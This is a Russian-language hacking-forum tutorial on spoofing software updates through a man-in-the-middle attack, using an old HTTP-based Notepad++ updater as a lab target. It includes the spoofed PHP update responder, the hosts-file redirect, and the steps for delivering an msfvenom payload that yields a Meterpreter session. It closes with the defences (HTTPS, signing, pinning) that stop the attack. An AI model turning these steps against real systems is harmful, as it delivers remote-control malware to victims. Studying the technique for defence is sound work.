ANTICHAT - Атака через фейковое обновление: разбираем MITM на классическом примере

https://forum.antichat.xyz/attachments/4837382/00.png

Привет, античат !

Эта статья посвящена теме, которая давно не дает мне покоя, — фейковым обновлениям ПО. Меня в целом захватывает мир атак типа Man-in-the-Middle (MITM), особенно их реализация внутри локальной сети. И подмена обновлений — один из самых коварных векторов. Года полтора назад я наткнулся на фреймворк Evilgrade и загорелся идеей понять его механику. Первая попытка разобраться с наскока провалилась, и я, честно говоря, забил. Но сегодня я вернулся к этой теме, и на этот раз добился результата.

Сразу оговорюсь: это не пошаговая инструкция для взлома. Моя цель — разобрать методологию атаки, показать ее внутреннюю кухню на простом и наглядном примере. Суть материала — продемонстрировать, как это работает на фундаментальном уровне. Давайте выйдем за рамки скрипт-кидди и прокачаем понимание процессов. Бездумно запускать готовый софт могут все, а вот понять принципы его работы — немногие.

Теоретические основы атаки
Прежде чем погружаться в практику, давайте разберем, как вообще устроен механизм обновления большинства программ.

Этапы обновления ПО:

Программа отправляет на сервер разработчика запрос для проверки новой версии (автоматически или по клику пользователя).
Сервер получает запрос, проверяет наличие обновлений и отправляет ответ.
Программа обрабатывает ответ: если обновление доступно — предлагает его скачать и установить, если нет — сообщает, что используется актуальная версия.

Имея это представление, мы можем выстроить четкий план атаки.

Этапы проведения атаки:

Перехватить и проанализировать запрос, который программа отправляет на сервер обновлений.
Изучить структуру и содержание ответа, который присылает легитимный сервер.
Поднять собственный веб-сервер в локальной сети.
Реализовать атаку типа DNS Spoofing, чтобы перенаправить запросы от жертвы с адреса сервера обновлений на наш локальный сервер.
Сформировать на нашем сервере поддельный ответ, который будет понятен программе и будет содержать ссылку на нашу вредоносную нагрузку.

Когда этапы ясны, можно переходить к реализации. Если теория кажется туманной, не переживайте — на практике все встанет на свои места. В качестве «подопытного кролика» мы будем использовать старую версию программы Notepad++, которая идеально подходит для демонстрации этого вектора атаки.
Практическая реализация
Для воспроизведения атаки в лабораторных условиях нам понадобится следующий инструментарий:

Notepad++ v6.0 (скачать) — важно использовать именно старую версию, так как она общается с сервером по небезопасному протоколу HTTP.
XAMPP (скачать) — для быстрого развертывания веб-сервера Apache.
Wireshark (скачать) — наш главный инструмент для анализа сетевого трафика.

Начнем с установки Notepad++ v6.0. После установки запустите программу и инициируйте проверку обновления. Для этого в меню нажмите на

Код:

?

и выберите пункт «Обновить Notepad++».

Вы увидите окно с предложением скачать новую версию. Это именно то, что нам нужно.

Пока что нажимаем «Отмена» и открываем Wireshark. Выберите ваш активный сетевой интерфейс (тот, через который идет трафик в интернет).

В поле фильтра введите

Код:

http

и нажмите Enter. Теперь снова повторите запрос на обновление в Notepad++. Через пару секунд остановите захват пакетов в Wireshark и приступайте к анализу. В колонке

Код:

Info

вы легко заметите

Код:

GET

запрос, URL которого содержит слово

Код:

update

.

Изучив этот запрос более детально, мы видим

Код:

Full request URI

, который ведет на

Код:

notepad-plus-plus.org

. Чтобы убедиться, что это нужный нам эндпоинт, давайте перейдем по полному URL в браузере: http://notepad-plus-plus.org/update/getDownloadUrl.php?version=6.0

В ответ мы получим XML-документ, который сообщает программе о наличии новой версии и где ее скачать:

XML:

Код:

&lt;

GUP>

&lt;

NeedToBeUpdated>yes

&lt;

/NeedToBeUpdated>

&lt;

Version>7.5.9

&lt;

/Version>

&lt;

Location>http://notepad-plus-plus.org/repository/7.x/7.5.9/npp.7.5.9.Installer.exe

&lt;

/Location>

&lt;

/GUP>

Отлично! Мы нашли интересующий нас запрос и знаем, какой ответ ожидает программа. Сбор информации завершен, переходим к активной фазе.

Поскольку мы работаем в лабораторных условиях, я упрощу некоторые шаги, а именно DNS Spoofing и поднятие сервера. Для чистоты эксперимента это не критично.

Устанавливаем XAMPP и запускаем модуль Apache.

Переходим в корневую директорию нашего локального сайта:

Код:

C:\xampp\htdocs

. Здесь создаем две папки:

Код:

update

Код:

repository

Код:

update

— обязательная папка, так как она присутствует в URL запроса. В ней будет лежать наш скрипт-ответчик.
Код:

repository

— необязательная папка. Мы можем указать любой путь для скачивания пейлоада, но для порядка и чистоты структуры положим его сюда.

Теперь в папке

Код:

update

создаем файл

Код:

getDownloadUrl.php

со следующим кодом:

PHP:

Код:

&

lt

;

?

php

// Устанавливаем заголовок, чтобы клиент понял, что это XML

header

(

'Content-type: text/xml'

)

;

// Формируем наш поддельный XML-ответ

$xml

=

&

lt

;

&

lt

;

&

lt

;

XML

&

lt

;

GUP

>

&

lt

;

NeedToBeUpdated

>

yes

&

lt

;

/

NeedToBeUpdated

>

&

lt

;

Version

>

9.9

.9

&

lt

;

/

Version

>

&

lt

;

Location

>

http

:

//notepad-plus-plus.org/repository/payload.exe&lt;/Location>

&

lt

;

/

GUP

>

XML

;

// Отдаем XML клиенту

echo

$xml

;

?>

Как видите, код почти полностью повторяет оригинальный ответ, за одним ключевым исключением: в теге

Код:

<Location>

мы указываем путь к нашему файлу

Код:

payload.exe

.

Сам

Код:

payload.exe

я сгенерировал на Kali Linux с помощью

Код:

msfvenom

. Пример его создания можно найти в статье [Metasploit] устанавливаем обратное TCP соединение через ngrok. Готовый exe-файл поместите в папку

Код:

C:\xampp\htdocs\repository

.

Важное замечание: стандартные пейлоады, сгенерированные Metasploit, сегодня легко обнаруживаются практически любым антивирусом. В реальных условиях атакующие используют продвинутые техники обфускации, шифрования и загрузчики, написанные на заказ.

Давайте убедимся, что все настроено правильно. Перейдите в браузере по адресу

Код:

http://localhost/repository/

и проверьте, что ваш

Код:

payload.exe

на месте.

Затем откройте

Код:

http://localhost/update/getDownloadUrl.php

, чтобы увидеть сгенерированный XML.

Если у вас все выглядит так же, как на скриншотах, — вы на верном пути!

Остался последний шаг: заставить систему жертвы отправлять запросы на наш локальный сервер вместо настоящего. В реальной атаке для этого используются техники ARP-spoofing + DNS-spoofing (например, с помощью

Код:

arpspoof

Код:

dnsspoof

в Kali). Мы же, для простоты, отредактируем файл

Код:

hosts

на атакуемой машине.

Откройте с правами администратора файл

Код:

C:\Windows\System32\drivers\etc\hosts

и добавьте в конец строку:

Bash:

Код:

127.0

.0.1 notepad-plus-plus.org

Эта запись заставит ОС при обращении к домену

Код:

notepad-plus-plus.org

перенаправлять весь трафик на

Код:

127.0.0.1

(localhost), то есть на наш XAMPP-сервер.

Подготовка завершена. Время для проверки.

Возвращаемся в Notepad++ и снова запускаем проверку обновления. Программа обратится к

Код:

notepad-plus-plus.org

, но благодаря нашей манипуляции с

Код:

hosts

попадет на наш сервер. Наш скрипт отдаст поддельный XML, и программа предложит скачать «обновление». Соглашаемся.

После скачивания появится окно установщика.

Соглашаемся на запуск. Notepad++ закроется, а наш

Код:

payload.exe

выполнится, предоставляя нам контроль над машиной. В моем случае — я получил сессию Meterpreter.

Почему сегодня эта атака (в чистом виде) почти не работает?
Важно понимать, что описанный метод является классическим и сегодня сработает только против очень старого или плохо написанного софта. Современные приложения защищены от таких атак несколькими уровнями безопасности:

HTTPS: Абсолютное большинство программ сегодня использует для обновлений зашифрованный протокол HTTPS. Это сразу же рушит всю атаку, так как мы не можем ни прочитать запрос, ни подменить ответ без манипуляций с TLS-сертификатами, что является отдельной, гораздо более сложной задачей.
Проверка цифровой подписи: Надежные разработчики подписывают свои инсталляторы цифровой подписью. Даже если бы нам удалось подсунуть пользователю наш

Код:

payload.exe

, операционная система или сама программа-обновлятор перед запуском проверила бы подпись. Обнаружив, что файл подписан не доверенным издателем (или не подписан вовсе), она бы заблокировала его выполнение.
Certificate Pinning: Некоторые особо защищенные приложения «зашивают» в себя отпечаток легитимного SSL-сертификата сервера обновлений. При попытке MITM-атаки с подменой сертификата приложение обнаружит несоответствие и просто прервет соединение.

Выводы
Надеюсь, эта статья оказалась полезной и вы узнали что-то новое. Несмотря на то, что описанный вектор атаки устарел, он прекрасно иллюстрирует фундаментальные принципы атак класса Man-in-the-Middle. Понимание того, как программы общаются по сети, как анализировать их трафик и как можно манипулировать этим общением, — это основа основ для любого специалиста по кибербезопасности.

Знания, которые вы получили, — это инструмент. А как его использовать, зависит только от вас. Удачи на просторах античат !